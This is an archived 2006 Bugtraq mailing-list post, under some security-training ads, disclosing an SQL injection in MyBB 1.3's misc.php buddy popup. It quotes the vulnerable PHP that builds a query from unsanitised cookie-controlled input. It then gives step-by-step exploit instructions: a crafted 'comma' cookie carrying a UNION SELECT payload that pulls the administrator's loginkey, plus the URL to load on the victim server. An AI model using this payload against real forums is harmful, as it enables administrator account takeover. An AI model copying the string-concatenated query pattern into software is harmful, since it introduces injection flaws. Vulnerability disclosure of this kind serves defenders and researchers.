Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

MyBB 1.3 NewSQL Injection

Subject: MyBB 1.3 NewSQL Injection
Date: 28 Feb 2006 16:27:54 -0000
MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :- 
misc.php

Linez :-

[code]
        $buddies = $mybb->user['buddylist'];

        $namesarray = explode(",",$buddies);

        if(is_array($namesarray))

        {

                while(list($key, $buddyid) = each($namesarray))

                {

                        $sql .= "$comma'$buddyid'"; <== HERE :) Uncleard Var !!

                        $comma = ",";

                }

        $timecut = time() - $mybb->settings['wolcutoff'];

        $query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users 
u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN 
($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. do not unset $_COOKIES .. 
then u can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
                                                                name    => 
"comma"
                                                                value   => 
"comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
 FROM mybb_users WHERE uid=1/*"
)

3- Check The URL :- 
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.

<Prev in Thread] Current Thread [Next in Thread>
  • MyBB 1.3 NewSQL Injection, o . y . 6 <=